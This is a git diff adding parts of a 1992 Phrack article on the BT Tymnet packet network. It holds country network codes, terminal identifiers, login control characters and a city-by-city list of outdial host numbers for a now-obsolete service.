+---------------|--------||----------------->>----------|--------|
+Hungary        |        || 2160/NEDEX      >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Hungary        |        || 2161/DATEX      >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Iceland        |        || 2740/Icepak     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+India          |        || 4042/GPSS       >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Indonesia      |        || 5101/SKDP       >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Ireland        |        || 2724/Eirpac     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Israel         |        || 4251/Isranet    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Italy          |   X    || BT TYMNET       >>          |        |
+---------------|--------||----------------->>----------|--------|
+Italy          |        || 2222/Darbo-Ital >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Italy          |        || 2227/Italcable  >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Ivory Coast    |        || 6122/SYTRANPAC  >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Jamaica        |        || 3380/Jamintel   >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Japan          |        || 4400/Global VAN >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Japan          |        || 4404/JAIS       >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Japan          |   X    || 4406/NIS-       >>          |        |
+               |        || BT TYMNET       >>          |        |
+---------------|--------||----------------->>----------|--------|
+Japan          |        || 4407/           >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Japan          |        || 4401/NTT DDX    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Japan          |        || 4408/Venus-P    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Japan          |        || 4410/NI+CI      >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Japan          |        || 4411/K-NET      >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Korea Rep      |        || 4501/DACOM-NET  >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Kuwait         |        || 4190/           >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Kuwait         |        || 4263/KUPAC      >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Lebanon        |        || 4155/RADUS      >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Luxembourg     |        || 2704/Luxpac-X.25>>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Luxembourg     |        || 2709/Luxpac-Pad >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Macau          |        || 4550/Macoupac   >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Madagascar     |        || 6360/           >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Malaysia       |        || 5021/Maynet     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Malta          |        || 2782/Maltapac   >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Mauritius      |        || 6170/MauriData  >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Mauritius      |        || 6171/MauriData  >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Mexico         |        || 3340/TELEPAC    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Morocco        |        ||                 >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Mozambique     |        || 6435/           >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Namibia        |        || 6490/Swanet     >>          |        |
+---------------|--------||----------------->>----------|--------|
+Niger          |        || 6142/           >>          |        |
+---------------|--------||----------------->>----------|--------|
+Netherlands    |   X    || BT TYMNET       >>          |        |
+---------------|--------||----------------->>----------|--------|
+Netherlands    |        || 2041/Datanet-1  >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Netherlands    |        || 2044/DABAS      >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Netherlands    |        || 2049/Datanet-1  >>          |        |
+               |        ||      Memocom    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+N. Antilles    |        || 3620/LANDSRAIDO >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+N. Marianas    |        || 5351/PCInet     >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+New Caledonia  |        || 5460/Tompac     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+New Zealand    |    X   || 3106/BT TYMNET  >>          |        |
+---------------|--------||----------------->>----------|--------|
+New Zealand    |        || 5301/Pacnet     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Norway         |        || 2422/Datapak    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Panama         |        || 7141/INTEL      >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Panama         |        || 7142/INTELPAQ   >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Peru           |        || 3104/IMPACS     >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Peru           |        || 7160/ENTEL      >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Philippines    |        || 5152/Philcom    >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Philippines    |        || 5154/GMCR       >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Philippines    |        || 5156/ETPI       >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Philippines    |        || 5151/CAPWIRE    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Polynesia      |        || 5470/Tompac     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Portugal       |        || 2680/Telepac    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Portugal       |        || 2682/CPRM       >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Puerto Rico    |        || 3300/WorldCom   >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Puerto Rico    |        || 3301/PRTC       >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Qatar          |        || 4271/DOHPAC     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Reunion        |        || 6470/Dompac     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+San Marino     |        || 2922/X NET SMR  >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Saudi Arabia   |        || 4201/Alwaseet   >>          |        |
+---------------|--------||----------------->>----------|--------|
+Saudi Arabia   |        || 4263/Bahnet     >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Senegal        |        || 6081/Serpac     >>          |        |
+---------------|--------||----------------->>----------|--------|
+Singapore      |        || 5250/           >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Singapore      |        || 5252/Telepac    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+South Africa   |        || 6550/Saponet    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+South Africa   |        || 6559/Saponet    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Spain          |   X    || BT TYMNET       >>          |        |
+---------------|--------||----------------->>----------|--------|
+Spain          |        || 2141/TIDA       >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Spain          |        || 2145/Iberpac    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Sweden         |   X    || BT TYMNET       >>          |        |
+---------------|--------||----------------->>----------|--------|
+Sweden         |        || 2401/Datapak    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Sweden         |        || 2402/Datapak    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Sweden         |        || 2403/Datapak    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Switzerland    |   X    || BT TYMNET       >>          |        |
+---------------|--------||----------------->>----------|--------|
+Switzerland    |        || 2284/Telepac    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Taiwan         |        || 4877/ITA        >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Taiwan         |        || 4872/PACNET     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Taiwan         |        || 4873/DCI Telepac>>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Thailand       |        || 5200/IDAR       >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Thailand       |        || 5201/Cateng     >>          |        |
+---------------|--------||----------------->>----------|--------|
+Tortola, BVI   |        || 3483/           >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Trinidad       |        || 3740/Textel     >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Trinidad       |        || 3745/Datanett   >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Tunisia        |        || 6050/RED25      >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Turkey         |        || 2860/           >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Turkey         |        || 2862/IGX        >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Turkey         |        || 2863/Turpac     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Turks BWI      |        || 3763/           >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+UAE            |        || 4241/           >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+UAE            |        || 3104/IMPACS     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+UAE            |        || 4243/EMDAN      >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+U. Kingdom     |   X    || BT TYMNET       >>          |        |
+---------------|--------||----------------->>----------|--------|
+U. Kingdom     |        || 2350/Mercury    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+U. Kingdom     |        || 2351/Mercury    >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+U. Kingdom     |        || 2341/BTI IPSS   >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+U. Kingdom     |        || 2355/JAIS-Japan >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+U. Kingdom     |        || 2342/BT PSS     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+U. Kingdom     |        || 2352/Hull       >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+United States  |   X    || 3106/BT TYMNET  >>          |        |
+---------------|--------||----------------->>----------|--------|
+Uruguay        |        || 7482/Antel      >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+USSR           |        || 2502/Iasnet     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+U.S. Virgin I  |        || 3320/UDTS-I     >>     X    |        |
+---------------|--------||----------------->>----------|--------|
+Vanuatu        |        || 5410/Viapac     >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Yugoslavia     |        || 2201/Yupac      >>          |   X    |
+---------------|--------||----------------->>----------|--------|
+Zimbabwe       |        || 6482/Zimnet     >>          |   X    |
+-----------------------------------------------------------------
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ F. Terminal Identifiers
+    ~~~~~~~~~~~~~~~~~~~~
+A terminal identifier indicates to the network the characteristics of your
+terminal.  Most terminals can use the "A" terminal identifier.  However, if
+your terminal requires a carriage return delay, for example, then the "I"
+or the "E" identifier should be used.
+
+At 'please type your terminal identifier' please enter:
+
+
+  A  for PC's and CRT terminals (SAVE parity)
+  C  for 300 baud Impact Printer Terminals
+  E  for Thermal Printer Terminals like the SILENT 700 series
+  F  for BETA transaction terminals
+  G  for the GE Terminet at 1200 baud
+  I  for 300 baud Thermal Printer Terminals
+  K  for EVEN/ODD parity terminals  (future implementation)
+  O  for MARK/SPACE parity terminals (BBS access)
+  Y  for 300 baud Transaction terminals
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ G. Login Options
+    ~~~~~~~~~~~~~
+At the 'please log in:' prompt the user can specify control characters to set
+the network to the needs of the user.  For example when you are connected to a
+database and the data is coming in to fast you can backpressure the data by
+typing ^S.  The network however will only react on this command if you
+specified ^R at the logon step.
+
+^E    - control E - Enter Full Duplex mode (future implementation)
+^H    - control H - Enter Half Duplex mode - disable echo!!
+^I    - control I - Build optimal circuit for Interactive traffic
+^P    - control P - Force EVEN Parity
+^R    - control R - Enable host backpressure X-on X-off
+^U    - control U - Force terminal data to uppercase
+^V    - control V - Build optimal circuit for Volume traffic
+^W    - control W - Erase login up to last terminator
+^X    - control X - Enable terminal backpressure X-on X-off
+^Z    - control Z - Disconnect/Logoff
+ESC   - escape    - Discard login and get NEW please log in prompt
+BREAK - break     - Switch to CCITT X.3 X.28 X.29 PAD (selected nodes)
diff --git a/phrack40/9.txt b/phrack40/9.txt
new file mode 100644
index 0000000..131635d
--- /dev/null
+++ b/phrack40/9.txt
@@ -0,0 +1,848 @@
+                                ==Phrack Inc.==
+
+                     Volume Four, Issue Forty, File 9 of 14
+
+                       _________________________________
+                     ||                                 ||
+                     ||            BT Tymnet            ||
+                     ||         British Telecom         ||
+                     ||                                 ||
+                     ||           Part 2 of 3           ||
+                     ||                                 ||
+                     ||    Presented by Toucan Jones    ||
+                     ||                                 ||
+                     ||          August 1, 1992         ||
+                     ||_________________________________||
+
+
+                            Welcome Back to Tymnet!
+
+
+PART 1
+ A. BT Tymnet Access Location Index
+ B. BT-GNS Access Within Regional Bell Operating Companies
+  1. Bell Atlantic
+  2. BellSouth
+  3. Pacific Bell
+  4. Southwestern Bell
+  5. Southern New England Telephone
+ C. Database or Timesharing Companies on Tymnet
+ D. Service Classifications For Database or Timesharing Companies Using Tymnet
+ E. Summary of Global Network Services By Country
+ F. Terminal Identifiers
+ G. Login Options
+
+PART 2
+ H. BT-GNS Worldwide Asynchronus Outdial Service
+
+PART 3
+ I. BT-GNS Worldwide Access Sorted By Node
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ H. BT-GNS Worldwide Asynchronus Outdial Service
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                                          DIALUP ACCESS           M
+- OUTDIAL -               PROV             100's bps              N
+HOST  CITY                 ST CNTRY DENS  3 12 24 96  AREA CODE   P COMMENTS
+----- -------------------- -- ----- ----  ---------- ------------ - --------
+7651  Anniston             AL  USA  LOW   B B  C         205      Y
+4101  Birmingham           AL  USA  HIGH  B B  C         205      Y
+2517  Dothan               AL  USA  LOW   B B  C         205      Y
+5641  Florence             AL  USA  LOW   B B  C         205      Y
+8287  Gadsden              AL  USA  LOW   B B  C         205      Y
+737   Huntsville           AL  USA  MED   B B  C         205      Y
+8829  Mobile               AL  USA  MED   B B  C         205      Y
+3245  Montgomery           AL  USA  LOW   B B  C         205      Y
+2439  Northport            AL  USA  LOW   B B  C         205      Y
+1751  Opelika              AL  USA  LOW   B B  C         205      Y
+2439  Tuscaloosa/Northport AL  USA  LOW   B B  C         205      Y
+15360 Fayetteville         AR  USA  LOW   B B  C         501      Y
+1297  Ft. Smith            AR  USA  LOW   B B  C         501      Y
+2725  Hot Springs          AR  USA  LOW   B B  C         501      Y
+2794  Jonesboro            AR  USA  LOW   B B  C         501      Y
+10690 Little Rock          AR  USA  MED   B B  C         501      Y
+10690 Little Rock          AR  USA  MED   B B  C         501      Y
+7380  Pine bluff           AR  USA  LOW   B B  C         501      Y
+15360 Springdale/Fayettevl AR  USA  LOW   B B  C         501      Y
+6112  Flagstaff            AZ  USA  LOW   B B  C         602      Y
+9532  Mesa/Phoenix         AZ  USA  HIGH  B B  C         602      Y
+9532  Mesa/Phoenix         AZ  USA  HIGH  B B  C         602      Y
+9532  Phoenix              AZ  USA  HIGH  B B  C         602      Y
+9532  Phoenix              AZ  USA  HIGH  B B  C         602      Y
+3232  Tucson               AZ  USA  MED   B B  C         602      Y
+3232  Tucson               AZ  USA  MED   B B  C         602      Y
+3530  Yuma                 AZ  USA  LOW   B B  C         602      Y
+8963  Alameda/Oakland      CA  USA  HIGH  B B  C         510      Y
+2940  Alhambra             CA  USA  MED   B B  C         818      Y
+2940  Alhambra             CA  USA  MED   B B  C         818      Y
+9184  Anaheim/Newprt Beach CA  USA  HIGH  B B  C         714      Y
+9184  Anaheim/Newprt Beach CA  USA  HIGH  B B  C         714      Y
+4457  Antioch              CA  USA  LOW   B B  C         510      Y
+2940  Arcadia/Alhambra     CA  USA  MED   B B  C         818      Y
+2940  Arcadia/Alhambra     CA  USA  MED   B B  C         818      Y
+3664  Bakersfield          CA  USA  LOW   B B  C         805      Y
+9182  Belmont/Redwood City CA  USA  HIGH  B B  C         415      Y
+8963  Berkeley/Oakland     CA  USA  HIGH  B B  C         510      Y
+9206  Beverly Hills/Shr Ok CA  USA  MED   B B  C         818      Y
+2841  Burbank              CA  USA  LOW   B B  C         818      Y
+3486  Burlingame/So. S.F.  CA  USA  LOW   B B  C         415      Y
+9206  Canoga Park/Shrm Oak CA  USA  MED   B B  C         818      Y
+7859  Cathedral City       CA  USA  LOW   B B  C         619      Y
+7801  Chico                CA  USA  LOW   B B  C         916      Y
+6294  Colton               CA  USA  MED   B B  C         714      Y
+9202  Concord/Walnut Creek CA  USA  LOW   B B  C         510      Y
+9202  Concord/Walnut Creek CA  USA  LOW   B B  C         510      Y
+5415  Corona               CA  USA  LOW   B B  C         714      Y
+4309  Covina/Diamond Bar   CA  USA  MED   B B  C         714      Y
+7276  Davis                CA  USA  LOW   B B  C         916      Y
+4309  Diamond Bar          CA  USA  MED   B B  C         714      Y
+06824 El Centro            CA  USA  LOW   B B  C         619      Y
+2940  El Monte/Alhambra    CA  USA  MED   B B  C         818      Y
+2940  El Monte/Alhambra    CA  USA  MED   B B  C         818      Y
+9203  El Segundo           CA  USA  MED   B B  C         310      Y
+09203 El Segundo           CA  USA  MED   B B  C         310      Y
+4304  Escondido/Vista      CA  USA  MED   B B  C         619      Y
+981   Eureka               CA  USA  LOW   B B  C         707      Y
+03513 Fairfield            CA  USA  LOW   B B  C         707      Y
+3513  Fairfield            CA  USA  LOW   B B  C         707      Y
+7399  Fremont              CA  USA  MED   B B  C         510      Y
+3996  Fresno               CA  USA  LOW   B B  C         209      Y
+3996  Fresno               CA  USA  LOW   B B  C         209      Y
+2841  Glendale/Burbank     CA  USA  LOW   B B  C         818      Y
+8963  Hayward/Oakland      CA  USA  HIGH  B B  C         510      Y
+3173  Inglewood/Vernon     CA  USA  HIGH  B B  C         213      Y
+3173  Inglewood/Vernon     CA  USA  HIGH  B B  C         213      Y
+3173  Inglewood/Vernon     CA  USA  HIGH  B B  C         213      Y
+3173  Inglewood/Vernon     CA  USA  HIGH  B B  C         213      Y
+9184  Irvine/Newport Beach CA  USA  HIGH  B B  C         714      Y
+9184  Irvine/Newport Beach CA  USA  HIGH  B B  C         714      Y
+5991  Lancaster            CA  USA  LOW   B B  C         805      Y
+9205  Long Beach           CA  USA  MED   B B  C         310      Y
+6616  Los Alamos/St. Maria CA  USA  LOW   B B  C         805      Y
+6450  Los Altos/San Jose   CA  USA  HIGH  B B  C         408      Y
+6450  Los Altos/San Jose   CA  USA  HIGH  B B  C         408      Y
+6450  Los Altos/San Jose   CA  USA  HIGH  B B  C         408      Y
+3173  Los Angeles/Vernon   CA  USA  HIGH  B B  C         213      Y
+3173  Los Angeles/Vernon   CA  USA  HIGH  B B  C         213      Y
+3173  Los Angeles/Vernon   CA  USA  HIGH  B B  C         213      Y
+3173  Los Angeles/Vernon   CA  USA  HIGH  B B  C         213      Y
+9203  Mar Vista/El Segundo CA  USA  MED   B B  C         310      Y
+9203  Mar Vista/El Segundo CA  USA  MED   B B  C         310      Y
+9203  MarinaDelRey/El Sgnd CA  USA  MED   B B  C         310      Y
+03501 Marysville           CA  USA  LOW   B B  C         916      Y
+14085 Merced               CA  USA  LOW   B B  C         209      Y
+2120  Modesto              CA  USA  LOW   B B  C         209      Y
+10401 Monterey             CA  USA  LOW   B B  C         408      Y
+10401 Monterey             CA  USA  LOW   B B  C         408      Y
+5134  Moorpark             CA  USA  LOW   B B  C         805      Y
+13891 Napa                 CA  USA  LOW   B B  C         707      Y
+9184  Newport Beach        CA  USA  HIGH  B B  C         714      Y
+9184  Newport Beach        CA  USA  HIGH  B B  C         714      Y
+9205  Norwalk/Long Beach   CA  USA  MED   B B  C         310      Y
+8963  Oakland              CA  USA  HIGH  B B  C         510      Y
+4309  Ontario/Diamond Bar  CA  USA  MED   B B  C         714      Y
+4112  Oxnard/Port Hueneme  CA  USA  MED   B B  C         805      Y
+9202  Pacheco/Walnut Creek CA  USA  LOW   B B  C         510      Y
+9202  Pacheco/Walnut Creek CA  USA  LOW   B B  C         510      Y
+7859  Palm Sprngs/Cath Cty CA  USA  LOW   B B  C         619      Y
+9182  Palo Alto/Redwd City CA  USA  HIGH  B B  C         415      Y
+2940  Pasadena/Alhambra    CA  USA  MED   B B  C         818      Y
+2940  Pasadena/Alhambra    CA  USA  MED   B B  C         818      Y
+9202  Pleasnthill/Walnt Ck CA  USA  LOW   B B  C         510      Y
+9202  Pleasnthill/Walnt Ck CA  USA  LOW   B B  C         510      Y
+4309  Pomona/Diamond Bar   CA  USA  MED   B B  C         714      Y
+4112  Port Hueneme         CA  USA  MED   B B  C         805      Y
+5416  Poway                CA  USA  LOW   B B  C         619      Y
+4972  Redding              CA  USA  LOW   B B  C         916      Y
+9182  Redwood City         CA  USA  HIGH  B B  C         415      Y
+6294  Riverside/Colton     CA  USA  MED   B B  C         714      Y
+9179  Sacramento           CA  USA  HIGH  B B  C         916      Y
+3655  Salinas              CA  USA  LOW   B B  C         408      Y
+6294  San Bernadino/Colton CA  USA  MED   B B  C         714      Y
+4447  San Clemente         CA  USA  LOW   B B  C         714      Y
+9183  San Diego            CA  USA  HIGH  B B  C         619      Y
+9183  San Diego            CA  USA  HIGH  B B  C         619      Y
+9206  San Fernando/Shr Oak CA  USA  MED   B B  C         818      Y
+9533  San Francisco        CA  USA  HIGH  B B  C         415      Y
+9533  San Francisco        CA  USA  HIGH  B B  C         415      Y
+9533  San Francisco        CA  USA  HIGH  B B  C         415      Y
+6450  San Jose             CA  USA  HIGH  B B  C         408      Y
+6450  San Jose             CA  USA  HIGH  B B  C         408      Y
+6450  San Jose             CA  USA  HIGH  B B  C         408      Y
+2979  San Luis Obispo      CA  USA  LOW   B B  C         805      Y
+3486  San Mateo/So. S.F.   CA  USA  LOW   B B  C         415      Y
+9205  San Pedro/Long Beach CA  USA  MED   B B  C         310      Y
+8094  San Rafael           CA  USA  LOW   B B  C         415      Y
+9184  Santa Ana/Newprt Bch CA  USA  HIGH  B B  C         714      Y
+9184  Santa Ana/Newprt Bch CA  USA  HIGH  B B  C         714      Y
+6295  Santa Barbara        CA  USA  MED   B B  C         805      Y
+6450  Santa Clara/San Jose CA  USA  HIGH  B B  C         408      Y
+6450  Santa Clara/San Jose CA  USA  HIGH  B B  C         408      Y
+6450  Santa Clara/San Jose CA  USA  HIGH  B B  C         408      Y
+3182  Santa Cruz           CA  USA  MED   B B  C         408      Y
+6116  Santa Maria          CA  USA  LOW   B B  C         805      Y
+9203  Santa Monica/El Sgnd CA  USA  MED   B B  C         310      Y
+4111  Santa Rosa           CA  USA  LOW   B B  C         707      Y
+9206  Sherman Oaks         CA  USA  MED   B B  C         818      Y
+3486  So. San Francisco    CA  USA  LOW   B B  C         415      Y
+3208  Stockton             CA  USA  LOW   B B  C         209      Y
+6450  Sunnyvale/San Jose   CA  USA  HIGH  B B  C         408      Y
+6450  Sunnyvale/San Jose   CA  USA  HIGH  B B  C         408      Y
+6450  Sunnyvale/San Jose   CA  USA  HIGH  B B  C         408      Y
+14338 Upland               CA  USA  LOW   B B  C         714      Y
+3830  Vallejo              CA  USA  LOW   B B  C         707      Y
+9206  Van Nuys/Sherman Oak CA  USA  MED   B B  C         818      Y
+4112  Ventura/Port Hueneme CA  USA  MED   B B  C         805      Y
+3173  Vernon               CA  USA  HIGH  B B  C         213      Y
+3173  Vernon               CA  USA  HIGH  B B  C         213      Y
+3173  Vernon               CA  USA  HIGH  B B  C         213      Y
+3173  Vernon               CA  USA  HIGH  B B  C         213      Y
+3598  Visalia              CA  USA  LOW   B B  C         209      Y
+4304  Vista                CA  USA  MED   B B  C         619      Y
+4309  W.Covina/Diamond Bar CA  USA  MED   B B  C         714      Y
+9202  Walnut Creek         CA  USA  LOW   B B  C         510      Y
+9202  Walnut Creek         CA  USA  LOW   B B  C         510      Y
+9206  West L.A./Shrmn Oaks CA  USA  MED   B B  C         818      Y
+7276  Woodland/Davis       CA  USA  LOW   B B  C         916      Y
+2584  Aurora/Denver        CO  USA  HIGH  B B  C         303      Y
+2584  Aurora/Denver        CO  USA  HIGH  B B  C         303      Y
+2584  Boulder/Denver       CO  USA  HIGH  B B  C         303      Y
+2584  Boulder/Denver       CO  USA  HIGH  B B  C         303      Y
+2660  Colorado Springs     CO  USA  MED   B B  C         719      Y
+2660  Colorado Springs     CO  USA  MED   B B  C         719      Y
+2584  Denver               CO  USA  HIGH  B B  C         303      Y
+2584  Denver               CO  USA  HIGH  B B  C         303      Y
+8737  Fort Collins         CO  USA  LOW   B B  C         303      Y
+6115  Grand Junction       CO  USA  LOW   B B  C         303      Y
+7743  Greeley              CO  USA  LOW   B B  C         303      Y
+14753 Pueblo               CO  USA  LOW   B B  C         719      Y
+9128  Bloomfield           CT  USA  HIGH  B B  C         203      Y
+9128  Bloomfield           CT  USA  HIGH  B B  C         203      Y
+6472  Bridgeport           CT  USA  MED   B B  C         203      Y
+7962  Fairfield/Westport   CT  USA  MED   B B  C         203      Y
+9128  Hartford/Bloomfield  CT  USA  HIGH  B B  C         203      Y
+3165  Meriden              CT  USA  LOW   B B  C         203      Y
+3165  Middletown/Meriden   CT  USA  LOW   B B  C         203      Y
+11036 New Haven            CT  USA  MED   B B  C         203      Y
+7955  New London           CT  USA  LOW   B B  C         203      Y
+7962  Norwalk/Westport     CT  USA  MED   B B  C         203      Y
+7955  Norwich/New London   CT  USA  LOW   B B  C         203      Y
+8071  Somers               CT  USA  LOW   B B  C         203      Y
+9129  Stamford             CT  USA  HIGH  B B  C         203      Y
+6472  Stratford/Bridgeport CT  USA  MED   B B  C         203      Y
+3073  Waterbury            CT  USA  LOW   B B  C         203      Y
+7962  Westport             CT  USA  MED   B B  C         203      Y
+2262  Washington/Fairfax   DC  USA  HIGH  B B  C         703      Y
+2262  Washington/Fairfax   DC  USA  HIGH  B B  C         703      Y
+2262  Washington/Fairfax   DC  USA  HIGH  B B  C         703      Y
+2262  Washington/Fairfax   DC  USA  HIGH  B B  C         703      Y
+2262  Washington/Fairfax   DC  USA  HIGH  B B  C         703      Y
+12900 Dover                DE  USA  LOW   B B  C         302      Y
+10800 Georgetown           DE  USA  LOW   B B  C         302      Y
+1784  Newark/Wilmington    DE  USA  MED   B B  C         302      Y
+1784  Wilmington           DE  USA  MED   B B  C         302      Y
+5656  Boca Raton/Delray    FL  USA  LOW   B B  C         407      Y
+3326  Boyntn Bch/WPalm Bch FL  USA  MED   B B  C         407      Y
+4637  Clearwater           FL  USA  MED   B B  C         813      Y
+3720  Cocoa                FL  USA  LOW   B B  C         407      Y
+3720  Cocoa                FL  USA  LOW   B B  C         407      Y
+5656  Delray               FL  USA  LOW   B B  C         407      Y
+9453  Fort Meyers          FL  USA  LOW   B B  C         813      Y
+4701  Fort Pierce          FL  USA  LOW   B B  C         407      Y
+7123  Ft. Lauderdale       FL  USA  MED   B B  C         305      Y
+10351 Gainesville          FL  USA  LOW   B B  C         904      Y
+7123  Hollywd/Ft. Laudrdle FL  USA  MED   B B  C         305      Y
+5797  Jacksonville         FL  USA  MED   B B  C         904      Y
+5797  Jacksonville         FL  USA  MED   B B  C         904      Y
+09914 Key West             FL  USA  LOW   B B  C         305      Y
+9900  Kissimmee            FL  USA  LOW   B B  C         407      Y
+820   Lakeland             FL  USA  LOW   B B  C         813      Y
+7096  Longwood/Orlando     FL  USA  MED   B B  C         407      Y
+3720  Melbourne/Cocoa      FL  USA  LOW   B B  C         407      Y
+3720  Melbourne/Cocoa      FL  USA  LOW   B B  C         407      Y
+3720  Merrit Isle/Cocoa    FL  USA  LOW   B B  C         407      Y
+3720  Merrit Isle/Cocoa    FL  USA  LOW   B B  C         407      Y
+6582  Miami                FL  USA  HIGH  B B  C         305      Y
+6582  Miami                FL  USA  HIGH  B B  C         305      Y
+11124 Naples               FL  USA  LOW   B B  C         813      Y
+7220  Ocala                FL  USA  LOW   B B  C         904      Y
+7096  Orlando              FL  USA  MED   B B  C         407      Y
+10699 Ormond Beach         FL  USA  LOW   B B  C         904      Y
+3407  Panama City          FL  USA  LOW   B B  C         904      Y
+3193  Pensacola            FL  USA  LOW   B B  C         904      Y
+7123  Pompno Bch/Fr. Ldrdl FL  USA  MED   B B  C         305      Y
+9902  Port St. Lucie       FL  USA  LOW   B B  C         407      Y
+3112  Sarasota             FL  USA  LOW   B B  C         813      Y
+3112  Sarasota             FL  USA  LOW   B B  C         813      Y
+4637  St. Petersbrg/Clrwtr FL  USA  MED   B B  C         813      Y
+12790 Tallahassee          FL  USA  MED   B B  C         904      Y
+5518  Tampa                FL  USA  HIGH  B B  C         813      Y
+6181  Vero Beach           FL  USA  LOW   B B  C         407      Y
+3326  West Palm Beach      FL  USA  MED   B B  C         407      Y
+820   Winterhaven/Lakeland FL  USA  LOW   B B  C         813      Y
+5774  Albany               GA  USA  LOW   B B  C         912      Y
+8795  Atlanta/Doraville    GA  USA  HIGH  B B  C         404      Y
+8795  Atlanta/Doraville    GA  USA  HIGH  B B  C         404      Y
+8795  Atlanta/Doraville    GA  USA  HIGH  B B  C         404      Y
+433   Augusta/Martinez     GA  USA  LOW   B B  C         404      Y
+433   Augusta/Martinez     GA  USA  LOW   B B  C         404      Y
+14525 Columbus             GA  USA  LOW   B B  C         404      Y
+8795  Doraville            GA  USA  HIGH  B B  C         404      Y
+8795  Doraville            GA  USA  HIGH  B B  C         404      Y
+8795  Doraville            GA  USA  HIGH  B B  C         404      Y
+3711  Macon/Warner Robins  GA  USA  LOW   B B  C         912      Y
+8795  Marietta/Doraville   GA  USA  HIGH  B B  C         404      Y
+8795  Marietta/Doraville   GA  USA  HIGH  B B  C         404      Y
+8795  Marietta/Doraville   GA  USA  HIGH  B B  C         404      Y
